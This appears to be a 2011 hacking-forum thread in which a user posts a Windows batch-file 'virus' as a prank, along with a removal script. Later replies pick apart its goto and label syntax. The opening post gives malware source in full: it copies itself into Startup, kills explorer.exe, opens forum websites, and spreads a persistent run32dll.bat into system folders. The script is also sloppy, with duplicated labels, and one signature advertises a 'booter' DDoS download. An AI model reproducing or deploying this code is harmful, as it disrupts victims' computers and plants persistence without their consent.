Login Register






Fun Batch File :D filter_list
Author
Message
Fun Batch File :D #1
Hello i have created a simple computer virus, this virus can get you a good laugh. Biggrin


@echo off
copy %0 C:\Progra~1\Startup
taskkill /IM explorer.exe
start http://www.hackcommunity.com
echo taskkill /IM explorer.exe > C:\Progra~1\Startup\run32dll.bat
echo start http://www.hackcommunity.com >> C:\Progra~1\Startup\run32dll.bat
IF NOT EXIST C:\Progra~1\Startup\run32dll.bat goto :fightingback






:fightingback
echo taskkill /IM explorer.exe > C:\Progra~1\Startup\run32dll.bat
echo start http://www.hackcommunity.com >> C:\Progra~1\Startup\run32dll.bat
copy C:\Progra~1\Startup\run32dll.bat C:\Windows\System32
copy C:\Windows\System32\run32dll.bat C:\Windows
copy C:\Windows\run32dll.bat C:\Docume~1\AllUse~1\Appdata
copy C:\Docume~1\AllUse~1\Appdata\run32dll.bat C:\Docume~1\AllUse~1\Desktop
goto :end





:end
exit




:fightingback
echo taskkill /IM explorer.exe > C:\Progra~1\Startup\run32dll.bat
echo start http:\\www.hackforums.net >> C:\Progra~1\Startup\run32dll.bat
copy C:\Progra~1\Startup\run32dll.bat C:\Windows\System32
copy C:\Windows\System32\run32dll.bat C:\Windows
copy C:\Windows\run32dll.bat C:\Docume~1\AllUse~1\Appdata
copy C:\Docume~1\AllUse~1\Appdata\run32dll.bat C:\Docume~1\AllUse~1\Desktop
goto :end





:end
exit


Name this file run32dll.bat or it will not work!
Here is the anti-virus for this in case you infect yourself:


@echo off
del C:\Progra~1\Startup\run32dll.bat
del C:\Windows\System32\run32dll.bat
del C:\Windows\run32dll.bat
del C:\Docume~1\AllUse~1\Desktop\run32dll.bat
del C:\Docume~1\AllUse~1\Appdata\run32dll.bat
start explorer.exe
start winlogin.exe
echo The virus is removed
pause
exit


It may not work on some computers.
Run as administrator on vista and windows 7.

Evil
(This post was last modified: 10-06-2011, 12:03 AM by kumaraya.)

Reply

RE: ~My Virus~ #2
do you think that this script is working? cause this:
Code:
goto :end

is syntax error (as far as i know)...
[Image: ap8g35.jpg]

Reply

RE: ~My Virus~ #3
hmmm it used to work before but i haven t tried it lately...

Reply

RE: ~My Virus~ #4
Try this then:
Code:
goto end

It's simple goto syntax, if you don't know how to use goto's then you need to review the basics
ArkPhaze
"Object oriented way to get rich? Inheritance"
Getting Started: C/C++ | Common Mistakes
[ Assembly / C++ / .NET / Haskell / J Programmer ]

Reply

RE: ~My Virus~ #5
why do you have so many ":end" tags and goto end commands? the processes are probably extremely confused...

Reply

RE: ~My Virus~ #6
why do you have so many ":end" tags and goto end commands? the processes are probably extremely confused...

Reply

RE: ~My Virus~ #7
hahahahaha xDDD <3

i am used to do scripts like that Tongue
[Image: wbNtD.jpg]
Booter Sharecash Download: CLICK HERE!

Reply

RE: ~My Virus~ #8
hahahahaha xDDD <3

i am used to do scripts like that Tongue
[Image: wbNtD.jpg]
Booter Sharecash Download: CLICK HERE!

Reply

RE: ~My Virus~ #9
using one goto end command would go to every one of those at the same time...if anything you'd want ":end, :end1, :end2" then "goto end, goto end2, etc..."

Reply

RE: ~My Virus~ #10
using one goto end command would go to every one of those at the same time...if anything you'd want ":end, :end1, :end2" then "goto end, goto end2, etc..."

Reply